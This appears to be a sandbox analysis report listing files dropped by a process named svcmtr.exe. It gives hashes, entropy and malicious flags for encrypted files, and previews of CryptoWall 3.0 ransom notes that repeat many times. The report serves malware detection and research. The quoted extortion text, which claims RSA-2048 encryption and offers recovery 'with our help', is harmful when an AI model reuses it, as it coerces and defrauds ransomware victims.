                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127806
                                                                                                                          Entropy (8bit):7.998573252148866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:sIw0JXzoI8ahf3c9HLdkVm2cInW0hwNKK7Y/2/:sIPXkIN/eyVmTIW0hB2YM
                                                                                                                          MD5:4D68065259D0000653EF10AA70011132
                                                                                                                          SHA1:20430E25373794D50942C263DB4D803A6F916FA0
                                                                                                                          SHA-256:C22CAAF89A21700DCA5D9FD97362365B5644AA5180C9BED3C92040BDDC2CC96D
                                                                                                                          SHA-512:D4120AC0D1AA990463E493175371908806248918B00997A8F7AB08A8E5BC00EF34F19357634DD586E1F60E53ECD29BC5FC528A466D7EFE9433EBFCE369D4D69B
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129838
                                                                                                                          Entropy (8bit):7.99835890104631
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9go6B7Yxz5r+jjv9pen/f0tJIMooyCvsd5dZ/w0:9WYjrSza/fcJIaO/B
                                                                                                                          MD5:01A1C69BCF816E2A730E1996184F0B5E
                                                                                                                          SHA1:8CDE6161590E9EACEC599AF7C5DDD86F47BC7E91
                                                                                                                          SHA-256:2CC160EAC786AAEE739F8B097222FD4311E5BDB912E130870D0CE97102D5C19E
                                                                                                                          SHA-512:A8FBF02B9C1F7E7E44770833BE170487A7602CE377F36C7FB0D9E2DBCCD57536B514ECDF329F85BF20ED2A3299317E9325D0CCA1DDE7ED1C9629933787912F90
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121870
                                                                                                                          Entropy (8bit):7.998281054733269
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Dsk1BqKG2kL+Vq+UYMFDhVIARuHDe7pV8W/6qs:jqL+VK/dVjy2yqs
                                                                                                                          MD5:6AC0EA6B5EFC5F4BA14E76A1AD633970
                                                                                                                          SHA1:9509E5D62A9FF48B6565119970EB259A89754BDA
                                                                                                                          SHA-256:450AB1F292D1BDA7E61FFC4A2FE375AE02AD305E98BFBC998A63CF3A3622EE73
                                                                                                                          SHA-512:7FFFCABF1728D70C1F3E0236F6EC9B84481E08C73354F249422CECBDB277314275AD9AADD5D6E771C907D43CCAEEFF67B63803330AF8159800F143E318FD689F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127422
                                                                                                                          Entropy (8bit):7.998537358548792
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZpJ/2CUg3CEH5++rwaut6s8j0C68O4Rb+D21JgHdU7X8+:Zn/2CTP51U8j0AB+DEJ9X8+
                                                                                                                          MD5:083B6B37A4CE5CFC68A0EE55FA9F1693
                                                                                                                          SHA1:728D1D981ED2AA3DE1385AA9642BC9AD6764E99A
                                                                                                                          SHA-256:102DA5D4B9399DB6002527B531A4644F872D2820C0B4168ADD6516137C81B547
                                                                                                                          SHA-512:D38C2C8DE8273A1DBC74AC3CD01367542BCA0452AFF1AB96DFDC5ED17F09C017336F88EA51D29E1F3374DBBA31033FC11F2A6E959AE059E0E72418224A08531F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123150
                                                                                                                          Entropy (8bit):7.998475908610258
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZVXZX4HOnWBDUIi//gTx4x6xfOHY8xRVyeXO1FZAEK:ZVJSSfOx1xfaxWekrAB
                                                                                                                          MD5:A26F8E0493CCC85947A79556D20E0E54
                                                                                                                          SHA1:16DC891886C7220DBE9F6195802F6AB7D60613DB
                                                                                                                          SHA-256:DA122B3568C050DACBF04E43C01218CB0B986F8964B3A59D0BC477EAD68679FC
                                                                                                                          SHA-512:1D7107732C6F93759137FB5277576AE24A24427C2037079B967A281399E0EF7DE9232E48787C38D925C6307E0769C6E0FD56C8A8CA4078ECECCD163F25F8831D
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123902
                                                                                                                          Entropy (8bit):7.998524202944642
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:faJBZvYgQQonRIJM+djXB8ZvvVpZ8RJoKrCPQ+6strCaBKVU5S:yJBZKnuS8CvvCJoud+dtrr4
                                                                                                                          MD5:E59498EAF49873FE36AFC6FCD72B60BB
                                                                                                                          SHA1:0FA0AA95B824755613E1C9DE5B49595F065C4985
                                                                                                                          SHA-256:6AF46AE03C86718530EC42E1F3B8596375EB7D25E4FBAF2963EC01ECB55DCBBC
                                                                                                                          SHA-512:CFF68493BC339C0626C57B3BDA40E592B82A393114A85E4C8F2ABCF814B234FA0B1169041DB3F735B832B9F226A10CB1ECC01D97CFF678D8C77428788BFA82FB
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125006
                                                                                                                          Entropy (8bit):7.998415768971659
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:tmYMmQbQI5wmy8KFlu0e89HKXWSz5VPya+tOrg8f3oXloX:tmYnQB7y8KYWSnPp+tOdeW
                                                                                                                          MD5:D7641AD1ECC678646229941F810E660A
                                                                                                                          SHA1:EAAE2D6143CEA402DB325459DCECB077F8EBCDC4
                                                                                                                          SHA-256:E198E295EC5C0A688A59522F8B82CDFF21DBE8637AC985610300B8D2AAE08D34
                                                                                                                          SHA-512:8210805D93CA0AD93D9086CF78042C6EF4DA6E70CDC66F86BAFF7F0D2F0445ECA87C97470AC0FED0A98D8FD84279A402D7DE8A67C2DD4DFFB5B9C5F482F6E790
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127502
                                                                                                                          Entropy (8bit):7.998399261999212
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:zmdu9nuzWzy2vSHKLT6ECZs5QCxh5rymVFglsrr4GP:zmd8sWmrqLT6ECZsqCxTXVOGP
                                                                                                                          MD5:556735A534B2CDF0D4850E42A04FFBE5
                                                                                                                          SHA1:4E26BF2571E625DF1B6C0D0946C608C29CF2C205
                                                                                                                          SHA-256:9FC2AB5DB2330267C120C0F5842F7DBFC5B4E4DAAE9338183B7258FCC47120DE
                                                                                                                          SHA-512:DF3365FBCB2F1BC4DC2782EF78C033772A9804F5DFA9488D9EE402A4269EA2AF8C2672FED2B48A26C69AB1CF672731A57C6262B65D2CFE20659A72DC8E4E907B
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123582
                                                                                                                          Entropy (8bit):7.9984901334997165
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:0GoggOtWC9SIXxBt+ADaUryrJszrywPqun:0GDRsQHBVDau7zdPq+
                                                                                                                          MD5:2DB1D114601C8446E00FBFCDAC1C1518
                                                                                                                          SHA1:4DB846F1860D11640F353E94CBD50CC5405A3F92
                                                                                                                          SHA-256:C261A1574F2CE7F8BDA2B13918087B99B58FE7EC4147172675F2DEBF70361899
                                                                                                                          SHA-512:1D3A01375F8A5F2F82FBF5DCCCA0727DBCF910C5D9D3FF35CEF986CA0D8B53C6EAAB19EF5FEE9CF7325EF9CF141F3BB3851A8355E70DF88A9F945A46D0760B6D
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119214
                                                                                                                          Entropy (8bit):7.9984035682912555
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:mlJwykQDIw2alpuU1PqkfdOOiXdaSa+KBidGDsOF2RIjL1ovBbgKFe8qbHmmw43k:erDn9E2NVbigbRzUkqNm5JMH8vS
                                                                                                                          MD5:3A88085FB9768C6EF6BE0CB78BE68499
                                                                                                                          SHA1:0F1C190F1C1F7CDE0F2740565F86ECB7FE68A1C7
                                                                                                                          SHA-256:91AC8222D88C60019CCCF86DA888A609CDC762031AEF670E505D98FD9F0FE4BB
                                                                                                                          SHA-512:D6AAA607F0323F1E36D28685191657A758FA804B9EF31169D3F89A078D2F51CE1B5C5EB4FA4B4F52FDAE9C927B5F7E201C5EE0DCF3BD4E396DE80A0E3E4B569F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3374
                                                                                                                          Entropy (8bit):7.886517893917096
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDv6Q7RrXD9141h+fl0uT3j9xTm5WBBfkDwYu:GoTjp14H+t0M3jiaecYu
                                                                                                                          MD5:07C69015B818C67D9A91E78916E8DBD0
                                                                                                                          SHA1:935E0AE1F19BC92BAD0440A7761B59391A0DAE69
                                                                                                                          SHA-256:27F4759F071D2A48F8177A10FA55C67F62518C44618F5297CB0E04A025F37BB7
                                                                                                                          SHA-512:FF4C75D4EFADBF9298DE05D79CDA57B46C0A216938CAB76B9CD25AF893B64DFDEF015CFC0F761413C5E46BB81F294DB35A7E77CC7DD5D85C16160F2A9FCEE561
                                                                                                                          Malicious:false
